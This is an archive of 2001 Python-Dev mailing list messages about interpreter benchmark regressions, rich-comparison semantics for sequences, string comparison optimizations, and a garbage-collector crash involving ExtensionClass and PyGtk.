Yes, I see that.  The conceptual problem I have is that in all previous
examples I've seen here they have taken as input and returned as outputs
only strings or unicode objects.

    mal> These two are very useful though when it comes to using codecs
    mal> for file wrappers:

This use I missed.
Thanks for the explanation.

Skip

From mal at lemburg.com  Wed May 16 20:33:44 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 20:33:44 +0200
Subject: [Python-Dev] Performance compares
Message-ID: <3B02C808.E3354D3F@lemburg.com>

After having read a little into the comparison thread, I ran some
performance comparisons of my own: one between the current CVS
version and Python 1.5.2.

Both versions were compiled on the same Linux machine, using the same
GCC compiler and optimization settings.

Here are the results from pybench 0.9 and pystone; some of the figures
show quite dramatic slow-downs. I'm not sure where they result from,
but they do concern me a bit, since the upgrade path from 1.5.2 is
probably the most common one to be expected in user-land.

Since it is possible that these figures result from my specific
machine setup, I'd like to know what other people see on their
machines.

Thanks.

--

Python 1.5.2:
Pystone(1.1) time for 10000 passes = 3.26
This machine benchmarks at 3067.48 pystones/second

Python CVS:
Pystone(1.1) time for 10000 passes = 4.43
This machine benchmarks at 2257.34 pystones/second

--

PYBENCH 0.9

Benchmark: /home/lemburg/tmp/pybench-cvs-O.pyb (rounds=10, warp=20)

Tests:                        per run  per oper.   diff *)
------------------------------------------------------------------------
BuiltinFunctionCalls:      1152.60 ms    9.04 us   +64.70%
BuiltinMethodLookup:        903.90 ms    1.72 us
CompareFloats:              908.30 ms    2.02 us   +40.94%
CompareFloatsIntegers:     1276.25 ms    2.84 us   +37.15%
CompareIntegers:           1075.50 ms    1.19 us   +21.09%
CompareLongs:               989.40 ms    2.20 us   +47.12%
CompareStrings:             844.80 ms    2.25 us   +33.99%
CompareUnicode:            1018.65 ms    2.72 us       n/a
ConcatStrings:             1226.30 ms    8.18 us   +92.56%
ConcatUnicode:             1575.40 ms   10.50 us       n/a
CreateInstances:           2094.05 ms   49.86 us  +101.86%
CreateStringsWithConcat:   1515.75 ms    7.58 us  +111.67%
CreateUnicodeWithConcat:   1833.85 ms    9.17 us       n/a
DictCreation:              2795.30 ms   18.64 us  +203.34%
DictWithFloatKeys:         2285.70 ms    3.81 us   +18.73%
DictWithIntegerKeys:       1444.65 ms    2.41 us   +58.53%
DictWithStringKeys:        1262.60 ms    2.10 us   +52.83%
ForLoops:                   989.95 ms   99.00 us   -10.01%
IfThenElse:                1232.45 ms    1.83 us   +23.25%
ListSlicing:                621.40 ms  177.54 us
NestedForLoops:             986.60 ms    2.82 us   +52.09%
NormalClassAttribute:      1231.15 ms    2.05 us   +36.70%
NormalInstanceAttribute:   1114.15 ms    1.86 us   +27.11%
PythonFunctionCalls:       1251.25 ms    7.58 us   +46.09%
PythonMethodCalls:         1034.35 ms   13.79 us   +42.19%
Recursion:                  922.15 ms   73.77 us   +36.76%
SecondImport:              1055.45 ms   42.22 us  +100.47%
SecondPackageImport:       1061.35 ms   42.45 us   +96.31%
SecondSubmoduleImport:     1292.35 ms   51.69 us   +77.89%
SimpleComplexArithmetic:   1748.00 ms    7.95 us  +120.97%
SimpleDictManipulation:    1172.85 ms    3.91 us   +47.85%
SimpleFloatArithmetic:      881.25 ms    1.60 us   +12.30%
SimpleIntFloatArithmetic:   833.80 ms    1.26 us
SimpleIntegerArithmetic:    839.00 ms    1.27 us
SimpleListManipulation:    1252.60 ms    4.64 us   +69.37%
SimpleLongArithmetic:      1360.65 ms    8.25 us  +100.43%
SmallLists:                2380.05 ms    9.33 us  +116.72%
SmallTuples:               1793.80 ms    7.47 us  +101.52%
SpecialClassAttribute:     1257.35 ms    2.10 us   +37.91%
SpecialInstanceAttribute:  1340.25 ms    2.23 us   +21.13%
StringMappings:            1601.50 ms   12.71 us       n/a
StringPredicates:          1059.70 ms    3.78 us       n/a
StringSlicing:             1235.90 ms    7.06 us   +98.32%
TryExcept:                 1272.55 ms    0.85 us   +28.39%
TryRaiseExcept:            1383.45 ms   92.23 us   +77.48%
TupleSlicing:              1163.05 ms   11.08 us   +75.29%
UnicodeMappings:           1232.80 ms   68.49 us       n/a
UnicodePredicates:         1294.95 ms    5.76 us       n/a
UnicodeProperties:         1410.45 ms    7.05 us       n/a
UnicodeSlicing:            1296.80 ms    7.41 us       n/a
------------------------------------------------------------------------
Average round time:       73388.00 ms                  n/a

*) measured against: /home/lemburg/tmp/pybench-1.5.2-O.pyb (rounds=10, warp=20)

(The diffs not shown are below noise level (+-10%).)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/

From tim.one at home.com  Wed May 16 21:07:49 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 15:07:49 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: <200105161524.KAA02518@cj20424-a.reston1.va.home.com>
Message-ID:

[Tim]
> The question remaining is how much of this list/tuple richcmp behavior is
> guaranteed by the language and how much is just implementation-dependent
> fuzz.

[Guido]
> Unclear what you're asking.  The language doesn't require any
> particular semantics for sequence comparisons, but the language of
> course includes the tuple and list sequence types, and it describes
> (albeit lacking some rigorous detail) what comparisons for those do.

The current

    Tuples and lists are compared lexicographically using comparison
    of corresponding items.

was quite clear in a cmp-only world.  In a richcmp world, "compared
lexicographically" is fuzzy enough that different implementations may do
different things in good faith, competent users may disagree about what
it means in specific cases, and programs may yield different results
across implementations (or random CVS patches).
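The following sketch makes the "compared lexicographically" question concrete. It records which element comparisons a modern CPython 3 performs for list < list. This is observed behaviour of one implementation, not a language guarantee. Elements are compared left to right with ==, the scan stops at the first pair that is not equal, and that pair alone gets one < comparison. Tracked and log are illustrative names.

```python
log = []


class Tracked:
    """Wraps a value and records each rich comparison made on it."""

    def __init__(self, value):
        self.value = value

    def __eq__(self, other):
        log.append(("==", self.value, other.value))
        return self.value == other.value

    def __lt__(self, other):
        log.append(("<", self.value, other.value))
        return self.value < other.value


left = [Tracked(1), Tracked(2), Tracked(9)]
right = [Tracked(1), Tracked(3), Tracked(0)]

result = left < right
print(result)  # True
for entry in log:
    print(entry)
# ('==', 1, 1)   first pair is equal, keep scanning
# ('==', 2, 3)   first unequal pair found, scanning stops
# ('<', 2, 3)    one ordering comparison settles the result
```

The third pair (9 versus 0), which would point the other way, is never examined. That matches the "leftmost element comparison that settles the issue" reading discussed in the message.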
> If there are specific lacks of detail, it probably helps to think
> about filling those in.

The *level* of additional detail intended is the cutoff between what's
guaranteed by the language and what's left up to the implementation.

The full truth before was relatively simple.  For a pair x, y of lists
or tuples,

    def __cmp__(x, y): # pretending this is a method on lists and tuples
        i = 0
        while i < len(x) and i < len(y):
            c = cmp(x[i], y[i])
            if c:
                return c
            i += 1
        return cmp(len(x), len(y))

was *almost* the entire tale, incl. that lengths were re-fetched on each
iteration.  What's left unexplained is the treatment of recursive lists,
and so the result of comparing them is a prime suspect for different
behavior across implementations and releases.

In a richcmp world, there are several additional ways in which the above
fails to capture the full truth, and each of those ways is another prime
suspect for surprises.  For example, I believe it's *intended* that:

1. Element comparisons continue to be strictly left-to-right, and that
   no element comparisons are to be performed after the leftmost element
   comparison that settles the issue (if any).

2. tuple/list comparison via == or != must use only == comparison on
   elements, and that implementations are allowed (but not required) to
   skip all element comparisons when == or != comparison is given
   lists/tuples of different sizes.

OTOH, I doubt (but don't know) it's intended that all implementations
must emulate other semantically significant details of the current
implementation, like:

1. <=, <, > and >= comparisons will do at most one element comparison
   that is not an == comparison.

2. Whenever a <, <=, > or >= element comparison is needed, the
   long-winded details of how that works, incl. but not limited to the
   specific "first try ==, then try <, then try >" strategy used to
   simulate a pre-richcmp cmp() when all else fails.

Going back to the original example:

>>> class C:
...     def __lt__(x, y): return 1
...     __eq__ = __lt__
...
>>> a, b = C(), C()
>>> a < b       #1
1
>>> [a] < [b]   #2
0
>>> cmp(a, b)   #3
0
>>> a > b       #4
1
>>> a == b      #5
1
>>> a != b      #6
1
>>>

Which of those results are *required* by the language, and which merely
*allowed*?

+ I believe #1, #4 and #5 are required.

+ I have no idea whether to call it "a bug" if the #2 and/or #3 and/or
  #6 results differed, e.g., under Jython, or under CPython 2.3.
  Indeed, I'm not even sure why #6 returns 1 under CPython today, and
  I've been staring at this a lot lately ...

OK, #6 ends up getting resolved by comparing object addresses, which
leaves "required or not?" fuzzy (i.e., *must* it be resolved that way?
or is it implementation-defined?).

From guido at digicool.com  Wed May 16 22:35:46 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 15:35:46 -0500
Subject: [Python-Dev] Rich comparison of lists and tuples
In-Reply-To: Your message of "Wed, 16 May 2001 15:07:49 -0400."
References:
Message-ID: <200105162035.PAA04299@cj20424-a.reston1.va.home.com>

[Subject fixed]

[Tim shows there's a lot left to the imagination when trying to glean
the meaning of list1==list2 using rich comparisons.]

I would like to break this down by defining the mapping between cmp()
and rich comparisons.  I propose:

- If cmp() is requested but not defined, and rich comparisons are
  defined, try ==, <, > in order; if all three yield false, act as if
  rich comparisons were not defined, and use the fallback comparison
  (i.e. by address).

- If a rich comparison is requested but not defined, use cmp() and use
  the obvious mapping.

- Continue to define the comparison of unequal sequences in terms of
  cmp().

- Testing == or != for sequences takes these shortcuts:

  1. if the lengths differ, the sequences differ

  2. compare the elements using == until a false return is found

Note that this defines 'x!=y' as 'not x==y' for sequences.  We could
easily go the extra mile and define != to use only != on the items;
but is this worth the extra complexity?
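The == / != shortcuts in the proposal above can be sketched in pure Python. The names seq_eq and seq_ne are hypothetical. This illustrates the proposal's rules, not CPython's implementation. One real difference: CPython's built-in container comparison also treats identical elements as equal without calling __eq__. The Exploding class shows that a length mismatch skips element comparisons entirely. That is the semantic point Tim raised about user-defined comparisons that raise exceptions.

```python
def seq_eq(x, y):
    """Sequence equality using the two proposed shortcuts."""
    # Shortcut 1: if the lengths differ, the sequences differ.
    if len(x) != len(y):
        return False
    # Shortcut 2: compare elements with == until a false result is found.
    for a, b in zip(x, y):
        if not (a == b):
            return False
    return True


def seq_ne(x, y):
    # The proposal defines x != y as not (x == y) for sequences.
    return not seq_eq(x, y)


class Exploding:
    """An element whose == must never be called."""

    def __eq__(self, other):
        raise RuntimeError("element comparison was not skipped")


print(seq_eq([1, 2], [1, 2]))                             # True
print(seq_ne([1, 2], [1, 3]))                             # True
print(seq_eq([Exploding()], [Exploding(), Exploding()]))  # False, no exception
# CPython's built-in list == takes the same length shortcut:
print([Exploding()] == [Exploding(), Exploding()])        # False
```

Defining != as `not ==` keeps the sketch small. Guido's alternative of using != on the items would need a second loop over the elements.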
--Guido van Rossum (home page: http://www.python.org/~guido/)

From skip at pobox.com  Wed May 16 22:37:43 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 16 May 2001 15:37:43 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <20010516091942.A16455@glacier.fnational.com>
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de> <20010516091942.A16455@glacier.fnational.com>
Message-ID: <15106.58647.495143.164636@beluga.mojam.com>

    Neil> In other words the GC is finding a tuple object that contains an
    Neil> element with a funny looking address (data segment?) and an
    Neil> ob_type of NULL.

Neil,

I'm not sure if the funny looking address is a red herring or the key
to the crime.  I tried running with a breakpoint set in
getBaseDictionary.  The first couple times, the type parameter looked
like

    $26 = (PyExtensionClass *) 0x80e7f60
    $27 = {ob_refcnt = 2, ob_type = 0x80e7f60, ob_size = 0, tp_name = 0x80d7138 "ExtensionClass", ...}

    $28 = (PyExtensionClass *) 0x80e8060
    $29 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, tp_name = 0x80d7209 "Base", ...}

The third time it looked like

    $30 = (PyExtensionClass *) 0x4019f120
    $31 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, tp_name = 0x4019dab2 "GObject", ...}

The difference between the first two calls and the third one is that
the first two objects are defined in ExtensionClass.o, which I
currently statically link into the interpreter.  The Gtk/GObject stuff
is dynamically loaded into the running executable, so it's not
surprising that it winds up at a wildly different address than the
ExtensionClass stuff.
My current best guess is that whatever object the tuple is referring to
is declared static in the dynamically loaded Gtk stuff and has no
business getting reclaimed by the collector.  Sounds like a missing
Py_INCREF somewhere.  At the earliest point I've been able to check that
object so far, its ob_type field is NULL.

Skip

From cpr at emsoftware.com  Thu May 17 00:24:15 2001
From: cpr at emsoftware.com (Chris Ryland)
Date: Wed, 16 May 2001 18:24:15 -0400
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
Message-ID: <00f201c0de57$03042c20$6901a8c0@EM2>

This talk is most entertaining!  Highly recommended to you good folk, if
only as a reinforcement of the good design principles embodied in Python
(with the exception of print >> ;-).

Jonathan Rees (an old Scheme/T hand) kept referring to Python whenever he
wanted to give an example of a modern dynamic language (disclaiming a lot
of knowledge about it).  He mentioned it three or four times (usually
positively), so it must be on the tip of his mind.

--
Cheers!
Chris Ryland
Em Software, Inc.
www.emsoftware.com

From greg at cosc.canterbury.ac.nz  Thu May 17 03:49:31 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 17 May 2001 13:49:31 +1200 (NZST)
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B02A9D9.113836D6@lemburg.com>
Message-ID: <200105170149.NAA18480@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" :

> You forgot the most important one ;-) ...
> 
> "print 'My first Python program'".decode("python").run()

Surely that should be:

"'My first Python program'.encode('stdout')".decode("python").decode("run")

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,          | A citizen of NewZealandCorp, a       |
Christchurch, New Zealand          | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz      +--------------------------------------+

From tim.one at home.com  Thu May 17 03:56:56 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 21:56:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de>
Message-ID:

[Martin v. Loewis]
> I'll put a patch on SF soon which does what you want to do, i.e. tries
> tp_compare as the first thing if tp_richcompare is not there.

Thanks!  I'll check it out.

> Even with this patch, your code is faster if strings have a
> richcompare.

OK, from what I understand, that makes no sense.  Does it to you?
Assuming you're still talking about my silly little "ab" < "cd" test,
then all the new code you put into your richcompare slot was a waste of
cycles for that specific case:  the new richcmp "objects the same type?"
test would fail, then the new "pointers equal?" test would fail, then the
new "op == Py_EQ?" test would fail, and then richcompare would give up
and call string_compare() anyway.  So I'm either missing something
fundamental about what you did, or it's a timing anomaly on your box
that defies obvious explanation ("but if I add three new tests that
don't pay off, and make an extra call, then it's faster!").

> Without richcompare, I get
>
> 0.720
> 0.720
> 0.720
> 0.730
> 0.720
> 0.720
> 0.730
> 0.720
> 0.720
> 0.730
>
> With it, I get
>
> 0.710
> 0.720
> 0.720
> 0.710
> 0.710
> 0.720
> 0.710
> 0.710
> 0.710
> 0.720

See above.

> Given that stock CVS python is in the 0.78 range, the difference is
> negligible, though.

Oh, I don't like giving up that easy on things that make no sense --
something else is happening here, although I've no idea what.
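One option for rerunning a micro-benchmark like the "ab" < "cd" test on a current Python is the standard timeit module. This is a minimal sketch, not the harness used in the thread. best_time() is a hypothetical helper that reports the minimum over several repeats, to damp the run-to-run noise described in these messages. It also times an empty statement as a rough estimate of loop overhead, the point of Tim's earlier tip about subtracting it out.

```python
import timeit

# Operands come from setup variables, so the comparison cannot be
# folded into a constant at compile time.
SETUP = 'a, b = "ab", "cd"'


def best_time(stmt, number=200_000, repeat=5):
    """Best (minimum) wall time in seconds for `number` runs of stmt."""
    return min(timeit.repeat(stmt, setup=SETUP, number=number, repeat=repeat))


overhead = best_time("pass")  # rough cost of timeit's own loop
lt = best_time("a < b")
eq = best_time("a == b")

for label, t in (("a < b", lt), ("a == b", eq)):
    # Subtracting the empty-statement time is only an approximation.
    print(f"{label:7} {t:.4f} s total, ~{t - overhead:.4f} s net")
```

The minimum is used instead of the mean because interference from the rest of the system can only make a run slower, never faster.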
From tim.one at home.com  Thu May 17 04:17:37 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 22:17:37 -0400
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B02C808.E3354D3F@lemburg.com>
Message-ID:

[MAL]
> Since it is possible that these figures result from my specific
> machine setup, I'd like to know what other people see on their
> machines.

Is this the same machine where you were able to get 15% difference a few
years ago by adding or removing an unreachable printf in ceval.c (or was
that Vladimir)?  If so, I bet it's degenerated to random 50% difference
since then.

My Win98SE box is *astonishingly* useless for timings.  Without fail,
the first time I run pystone after a reboot yields a result a solid 50%
higher than the second or subsequent times I run it (yes, it's
major-league *slower* the second time).  This is true across dozens of
trials over several months, and across all versions of Python.  And
simple little loops routinely vary in reported runtime by a factor of 3.
I may have to dig my old Win95 box out of the packing crate <0.6 wink>.

None of that changes, of course, that the numbers you got are scary.

From jeremy at digicool.com  Thu May 17 00:37:47 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Wed, 16 May 2001 18:37:47 -0400 (EDT)
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B02C808.E3354D3F@lemburg.com>
References: <3B02C808.E3354D3F@lemburg.com>
Message-ID: <15107.315.19349.268345@slothrop.digicool.com>

As usual, the results you're reporting are quite different than what I
see on my machine.  I'd like to think that my machine is more normal
than yours, but I expect we're both oddballs <0.2 wink>.

I see basically the same slowdowns that you see, but the amount of the
slowdown is quite a bit smaller.  I compared current CVS with 1.5.2,
both compiled with GCC 2.95.3 and the -O3 flag; ran pybench on an
800MHz P3 with 256MB RAM running Linux 2.2.17.
Python 1.5.2: Pystone(1.1) time for 10000 passes = 0.85 This machine benchmarks at 11764.7 pystones/second Python CVS: Pystone(1.1) time for 10000 passes = 0.94 This machine benchmarks at 10638.3 pystones/second PYBENCH 0.9 Benchmark: cvs (rounds=10, warp=100) Tests: per run per oper. diff * ------------------------------------------------------------------------ BuiltinFunctionCalls: 41.85 ms 1.64 us +31.40% CompareFloats: 39.60 ms 0.44 us +13.96% CompareFloatsIntegers: CompareIntegers: CompareLongs: 39.85 ms 0.44 us +15.01% CompareStrings: CompareUnicode: ConcatStrings: 48.65 ms 1.62 us +46.76% ConcatUnicode: CreateInstances: 75.75 ms 9.02 us +55.54% CreateStringsWithConcat: 51.60 ms 1.29 us +62.78% CreateUnicodeWithConcat: DictCreation: 87.80 ms 2.93 us +115.72% DictWithFloatKeys: DictWithIntegerKeys: DictWithStringKeys: ForLoops: 63.85 ms 31.93 us -13.60% IfThenElse: ListSlicing: NestedForLoops: 32.95 ms 0.66 us +10.39% NormalClassAttribute: NormalInstanceAttribute: PythonFunctionCalls: 48.85 ms 1.48 us +11.78% PythonMethodCalls: 38.95 ms 2.60 us +12.09% Recursion: SecondImport: 37.80 ms 7.56 us +65.79% SecondPackageImport: 38.95 ms 7.79 us +50.68% SecondSubmoduleImport: 49.90 ms 9.98 us +35.05% SimpleComplexArithmetic: 58.95 ms 1.34 us +74.67% SimpleDictManipulation: SimpleFloatArithmetic: SimpleIntFloatArithmetic: SimpleIntegerArithmetic: SimpleListManipulation: 43.65 ms 0.81 us +15.63% SimpleLongArithmetic: 42.70 ms 1.29 us +53.32% SmallLists: 79.15 ms 1.55 us +56.89% SmallTuples: 66.65 ms 1.39 us +43.03% SpecialClassAttribute: SpecialInstanceAttribute: StringMappings: StringPredicates: StringSlicing: 39.00 ms 1.11 us +28.71% TryExcept: TryRaiseExcept: 50.60 ms 16.87 us +27.46% TupleSlicing: 37.90 ms 1.80 us +26.54% UnicodeMappings: UnicodePredicates: UnicodeProperties: UnicodeSlicing: ------------------------------------------------------------------------ Average round time: 3177.00 ms n/a *) measured against: 1.5.2 (rounds=10, warp=100) (As MAL did, I 
removed all the results where the difference is within +/- 10%.) i-never-do-simple-complex-arithmetic-anyway-ly yr's, Jeremy From martin at loewis.home.cs.tu-berlin.de Thu May 17 08:12:18 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Thu, 17 May 2001 08:12:18 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> > OK, from what I understand, that makes no sense. Does it to you? After reviewing everything again, I think I now do: In the richcomp case, I have res = (*f1)(v, w, op); if (res != Py_NotImplemented) return res; f1 is string_richcompare, so I get 2 function calls inside do_richcmp: one to string_richcompare, the other one to string_compare, as my optimizations are not triggered in your example. If I set tp_richcompare of strings to 0, I get past this code, and do c = (*f)(v, w); if (PyErr_Occurred()) return NULL; return convert_3way_to_object(op, c); Here, I get 3 function calls: f is string_compare, then PyErr_Occurred, finally convert_3way_to_object, which converts {-1,0,1} x Op -> {Py_True, Py_False}. Indeed, when I inline convert_3way_to_object, I get the same speed in both cases (with the remaining differences attributed to measurement and gcc doing register usage differently in both functions). I'd still be in favour of giving strings a richcompare, since it allows to optimize what I think is the single most frequent case: Py_EQ on strings.
With a control flow like if (a->ob_size != b->ob_size) goto False; if (a->ob_size == 0) goto True; if (a->ob_sval[0] != b->ob_sval[0]) goto False; if(memcmp(a->ob_sval, b->ob_sval, a->ob_size)) goto False; else goto True; we can reduce the number of function calls Regards, Martin From skip at pobox.com Thu May 17 08:42:41 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 17 May 2001 01:42:41 -0500 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround Message-ID: <15107.29409.242342.200378@beluga.mojam.com> Over the past couple days I've included python-dev on various messages in an ongoing thread about a segmentation violation I was getting with the new PyGtk2 wrappers. With some excellent assistance from the GC maestro, Neil Schemenauer, I finally know what's going on and I have a simple workaround that lets me get back to work. Here's a summary of the problem. When defining ExtensionClass types, you need to create and initialize a PyExtensionClass struct. It looks something like so: PyExtensionClass PyGtkTreeSortable_Type = { PyObject_HEAD_INIT(NULL) 0, /* ob_size */ "GtkTreeSortable", /* tp_name */ sizeof(PyPureMixinObject), /* tp_basicsize */ ... }; Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would normally be the address of a type object (e.g. &PyType_Type). However, Jim Fulton pointed out that on Windows you can't get the address of &PyType_Type object at compile time. Accordingly, ExtensionClass provides a PyExtensionClass_Export macro whose responsibility is, in part, to set the ob_type field appropriately at runtime. (I'm not sure why this Windows nit doesn't afflict other type declarations like PyTuple_Type. I'm sure others will know why. I just accept Jim's word as gospel and move on...) A problem arises if the garbage collector runs while the module initialization function is running, but before all the ob_type fields have been assigned their correct values. 
In this case, a one-element tuple representing the bases of a particular PyGtk extension class was traversed by the garbage collector. The workaround turns out to be exceedingly simple: import gc gc.disable() import gtk gc.enable() I can handle doing that from Python code for the time being and will leave it up to others to decide how, if at all, ExtensionClass should be changed to correct the problem. Skip From martin at loewis.home.cs.tu-berlin.de Thu May 17 08:41:15 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Thu, 17 May 2001 08:41:15 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de> > 1. String objects are also equal despite being different objects, > if their ob_sinterned pointers are equal and non-NULL. So if > you're looking for every trick in & out of the book, that's > another one. That does not help. In the entire test suite, there are 0 instances where strings are compared which are not identical, but have equal ob_sinterned pointers. > > So 5% of the calls are with identical strings, for which I can > > immediately decide the outcome. > > But also at the cost of doing a fruitless compare and branch in 95% > of calls. Whether there's a fruitless branch depends on your compiler. With gcc 3, you can write if (__builtin_expect(a == b, 0)) { and then the body of the if block will be moved out of the way of linear control flow. > Any idea where those 800,000 virgin calls to oldcomp are coming > from? That's a lot. As far as I could trace it, most of them come from lookdict_string (at various locations inside this function). > > #comps: 2949421 > > #memcmps: 917776 > > > > So still, ca. 30% can be decided by first byte. > > Sorry, I couldn't follow this part, except noting that 917776 is about 30% of > 2949421, in which case I would have expected you to say that 70% can be > decided by first byte. Oops, you are right. 
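To make the Py_EQ control flow Martin proposed earlier in this thread concrete, here is a small Python model of it. It is a sketch, not CPython's code: bytes objects stand in for PyStringObject, the hypothetical function string_eq mirrors the length check, the empty-string shortcut and the first-byte test, and the final comparison stands in for the memcmp() call.

```python
def string_eq(a: bytes, b: bytes) -> bool:
    """Python model of the proposed Py_EQ fast path for strings.

    Mirrors the C control flow step by step; the final comparison
    stands in for the memcmp() call.
    """
    # Strings of different length can never be equal (ob_size check).
    if len(a) != len(b):
        return False
    # Two empty strings are equal; nothing left to compare.
    if len(a) == 0:
        return True
    # Cheap first-byte test, which rejects many unequal strings early.
    if a[0] != b[0]:
        return False
    # Full comparison (memcmp over all ob_size bytes in the C version).
    return a == b


print(string_eq(b"spam", b"spam"))  # True
print(string_eq(b"spam", b"spom"))  # False: same length and first byte
```

Only the last step touches every byte, which is why the share of calls settled by the first byte matters for the statistics quoted above.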
> It's clearer that this is going to hurt sorting (& bisect etc), by > adding yet another layer of function call to get Py_LT resolved (as > for dict compares too, the string richcmp can't do anything to speed > up Py_LT that string oldcmp can't do just as efficiently -- indeed, > that's the great advantage oldcmp's "compare first character" test > had: that *can* decide Py_LT in one byte much of the time (but > length comparison cannot)). So to support sorting better, I should special-case Py_LT in string_richcompare also, to avoid the function call ?-) > Note too earlier mail about how adding a richcmp slot to strings will > suddenly slow cmp(string1, string2) (which is the usual way to program a > search tree, because cmp() *used* to call a string comparison routine only > once; but after adding a richcmp slot, each cmp(string1, string2) will call > the richcmp slot from 1 thru 3 times (data-dependent)). Yes, that is a serious problem. Fortunately, very few calls in my programs go to string_compare through cmp() now. But then, your programs are different, of course... Regards, Martin From mal at lemburg.com Thu May 17 08:54:37 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 08:54:37 +0200 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: <3B0375AD.24E039B0@lemburg.com> skip at pobox.com wrote: > > Over the past couple days I've included python-dev on various messages in an > ongoing thread about a segmentation violation I was getting with the new > PyGtk2 wrappers. With some excellent assistance from the GC maestro, Neil > Schemenauer, I finally know what's going on and I have a simple workaround > that lets me get back to work. Here's a summary of the problem. > > When defining ExtensionClass types, you need to create and initialize a > PyExtensionClass struct. 
It looks something like so: > > PyExtensionClass PyGtkTreeSortable_Type = { > PyObject_HEAD_INIT(NULL) > 0, /* ob_size */ > "GtkTreeSortable", /* tp_name */ > sizeof(PyPureMixinObject), /* tp_basicsize */ > ... > }; > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would > normally be the address of a type object (e.g. &PyType_Type). However, Jim > Fulton pointed out that on Windows you can't get the address of &PyType_Type > object at compile time. Accordingly, ExtensionClass provides a > PyExtensionClass_Export macro whose responsibility is, in part, to set the > ob_type field appropriately at runtime. (I'm not sure why this Windows nit > doesn't afflict other type declarations like PyTuple_Type. I'm sure others > will know why. I just accept Jim's word as gospel and move on...) > > A problem arises if the garbage collector runs while the module > initialization function is running, but before all the ob_type fields have > been assigned their correct values. In this case, a one-element tuple > representing the bases of a particular PyGtk extension class was traversed > by the garbage collector. I wonder how the GC collector could "see" the type object before it has been initialized... since PyGtkTreeSortable_Type is a static C array and not a known PyObject until you add it to some Python dictionary as type object or use it for creating instances, it seems strange that the GC collector can reach out for it and get hit by the fact that it is not yet properly initialized. Some logic in PyExtensionClass_Export() or the GTK module must be twisted. > The workaround turns out to be exceedingly simple: > > import gc > gc.disable() > import gtk > gc.enable() > > I can handle doing that from Python code for the time being and will leave > it up to others to decide how, if at all, ExtensionClass should be changed > to correct the problem. 
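The quoted workaround leaves the collector disabled if the import raises. A slightly more defensive variant, sketched here with a hypothetical helper named gc_paused, uses contextlib.contextmanager and try/finally to restore whatever GC state was in effect before. Like the original, it only hides the ordering problem; it does not fix the type objects that are reachable before initialization.

```python
import contextlib
import gc


@contextlib.contextmanager
def gc_paused():
    """Temporarily disable the cyclic garbage collector.

    The previous state is restored even if the body raises, and a
    collector that was already disabled stays disabled.
    """
    was_enabled = gc.isenabled()
    gc.disable()
    try:
        yield
    finally:
        if was_enabled:
            gc.enable()


# Usage (gtk is the module from this thread; any import works the same way):
# with gc_paused():
#     import gtk
```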
-- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at effbot.org Thu May 17 09:00:20 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Thu, 17 May 2001 09:00:20 +0200 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: <00c101c0de9f$0a6c4d10$e46940d5@hagrid> Skip wrote: > When defining ExtensionClass types, you need to create and initialize a > PyExtensionClass struct. It looks something like so: > > PyExtensionClass PyGtkTreeSortable_Type = { > PyObject_HEAD_INIT(NULL) > 0, /* ob_size */ > "GtkTreeSortable", /* tp_name */ > sizeof(PyPureMixinObject), /* tp_basicsize */ > ... > }; > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would > normally be the address of a type object (e.g. &PyType_Type). However, Jim > Fulton pointed out that on Windows you can't get the address of &PyType_Type > object at compile time. Accordingly, ExtensionClass provides a > PyExtensionClass_Export macro whose responsibility is, in part, to set the > ob_type field appropriately at runtime footnote: this is usually done in the module init function, *before* the call to Py_InitModule. see: http://www.python.org/doc/FAQ.html#3.24 if the garbage collector can run after Python calls a module's init- function, but before that module calls back into Python, anything can happen... 
